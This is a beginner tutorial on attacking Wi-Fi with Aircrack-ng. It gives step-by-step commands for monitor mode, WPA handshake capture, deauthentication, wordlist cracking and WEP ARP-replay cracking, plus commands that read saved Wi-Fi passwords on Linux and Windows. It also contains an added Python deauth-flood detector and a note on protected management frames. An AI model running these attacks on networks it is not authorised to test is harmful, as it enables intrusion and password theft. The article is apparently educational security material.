⚠️ Warning: Hacking unauthorized networks is a crime. Use this information only on your own networks or in legal challenges like Hack The Box. I am not responsible for any misuse.
🔍 Part One: Basics You Need to Know Before Starting
1. What is Wi-Fi and How Does It Work?
- Wi-Fi: Data exchange wirelessly via radio waves (think “radio, but for the internet!”).
- Access Point: The device that broadcasts the network (like a router).
- Data Packets: Information sent between devices (like “secret messages” that can be intercepted by sniffing).
2. Types of Wi-Fi Encryption (and Can They Be Cracked?)
| Type | Strength | Notes |
|---|---|---|
| WEP | ❌ Very Weak | Can be cracked within minutes! |
| WPA | ⚠️ Moderate | Requires a long time |
| WPA2/WPA3 | ✅ Strong | Very difficult — requires an advanced attack |
💻 Part Two: Wi-Fi Hacking Using Kali Linux (Aircrack-ng)
Required Tools
- Kali Linux — downloadable from kali.org
- Aircrack-ng — pre-installed in Kali
- A Wi-Fi adapter that supports Monitor Mode
Step 1: Enable Monitor Mode
```bash
# Temporarily stop the Wi-Fi service
sudo systemctl stop NetworkManager
# Enable monitor mode on the Wi-Fi interface (example: wlan0)
sudo airmon-ng start wlan0
```
airmon-ng switches the network card from normal “managed” mode into monitor mode, in which it captures every 802.11 frame in range instead of only the frames addressed to it.
Step 2: Discover Available Networks
```bash
# Scan nearby networks
sudo airodump-ng wlan0mon
```
What is displayed:
- BSSID — The router’s MAC address
- CH — The network channel
- ESSID — The network name (e.g., STC_5G)
Step 3: Capture the Handshake
```bash
# Focus on a specific network (replace BSSID and CH with actual values)
sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 --write handshake wlan0mon
```
When a device joins a WPA/WPA2 network, it performs a four-way handshake with the router. Capturing that handshake allows the password to be attacked offline.
Step 4: Deauth Attack to Capture the Handshake
```bash
# Force connected devices to reconnect
sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 wlan0mon
```
This attack temporarily disconnects devices. When they reconnect, the handshake is captured.
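What Step 4 looks like from the defender’s side. This is an added example, not code from the article or from the Aircrack-ng project: a small wireless-IDS style check that flags a deauthentication flood against a BSSID, run over constructed frame records (the record layout, the timestamps and the second BSSID are all assumptions made for the example).

```python
from collections import deque

# 802.11 management-frame subtypes (type 0) that knock a client off the network
DISASSOCIATION, DEAUTHENTICATION = 10, 12

# BSSID from the article's examples plus one constructed BSSID for a second, quiet network
TARGET_AP = "00:11:22:33:44:55"
OTHER_AP = "AA:BB:CC:DD:EE:FF"  # constructed placeholder

# Constructed frame records, the kind a monitor-mode sniffer would hand to a wireless IDS:
# a few normal beacons, then a burst of 20 deauth frames against TARGET_AP within 0.2 s,
# then one isolated deauth from OTHER_AP (normal housekeeping, not an attack).
SAMPLE_FRAMES = (
    [{"ts": 0.1 * i, "type": 0, "subtype": 8, "bssid": TARGET_AP} for i in range(5)]
    + [{"ts": 1.0 + 0.01 * i, "type": 0, "subtype": DEAUTHENTICATION, "bssid": TARGET_AP}
       for i in range(20)]
    + [{"ts": 3.0, "type": 0, "subtype": DEAUTHENTICATION, "bssid": OTHER_AP}]
)


def detect_deauth_flood(frames, threshold=8, window=2.0):
    """Return {bssid: peak_count} for every BSSID that saw more than `threshold`
    deauth/disassoc frames inside any sliding `window` of seconds.

    A handful of such frames per minute is normal roaming; dozens in a second
    is the signature of a tool like aireplay-ng --deauth."""
    recent = {}   # bssid -> deque of timestamps still inside the window
    flagged = {}  # bssid -> largest burst size observed
    for f in sorted(frames, key=lambda f: f["ts"]):
        if f["type"] != 0 or f["subtype"] not in (DISASSOCIATION, DEAUTHENTICATION):
            continue
        q = recent.setdefault(f["bssid"], deque())
        q.append(f["ts"])
        while f["ts"] - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold:
            flagged[f["bssid"]] = max(flagged.get(f["bssid"], 0), len(q))
    return flagged


if __name__ == "__main__":
    for bssid, burst in detect_deauth_flood(SAMPLE_FRAMES).items():
        print(f"deauth flood against {bssid}: {burst} frames within 2 s")
```

The practical mitigation is Protected Management Frames (802.11w, mandatory in WPA3): with PMF enabled, clients discard deauthentication frames that are not cryptographically authenticated, so a forged deauth no longer forces a reconnect.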
Step 5: Crack the Password Using a Wordlist
```bash
# Use Aircrack-ng to crack the handshake (replace handshake-01.cap with your filename)
sudo aircrack-ng handshake-01.cap -w /usr/share/wordlists/rockyou.txt
```
rockyou.txt is a famous wordlist containing millions of common passwords like password123.
⏳ Time required: Minutes to hours, depending on password strength.
📱 Part Three: Retrieving Saved Wi-Fi Passwords (No Special Tools)
Some devices automatically store Wi-Fi passwords locally. These can be retrieved if you have access to the device.
On Linux
```bash
# Search NetworkManager config files for stored passwords
sudo cat /etc/NetworkManager/system-connections/* | grep psk=
```
On Windows (No Software Needed)
- Open Command Prompt (CMD) as Administrator
- Run:
```bat
netsh wlan show profile name="NetworkName" key=clear
```
Look for Key Content in the output — that’s the password in plain text.
🔥 Practical Example: Cracking a Weak WEP Network (In ~3 Minutes)
```bash
# 1. Start monitor mode
sudo airmon-ng start wlan0
# 2. ARP Replay attack to increase data traffic
sudo aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:AA:BB wlan0mon
# 3. Crack the encryption (WEP is very weak); output.cap is the capture file written by airodump-ng
sudo aircrack-ng output.cap
```
The password appears within minutes due to WEP’s fundamental cryptographic weaknesses.
Summary
Wi-Fi security heavily depends on the encryption protocol used. WEP is effectively broken and should never be used. WPA2 with a strong, unique password remains the practical standard for most users, while WPA3 offers additional protections for newer devices.
This article is part of the “Cybersecurity from Scratch” series. Always practice ethical hacking in authorized environments only.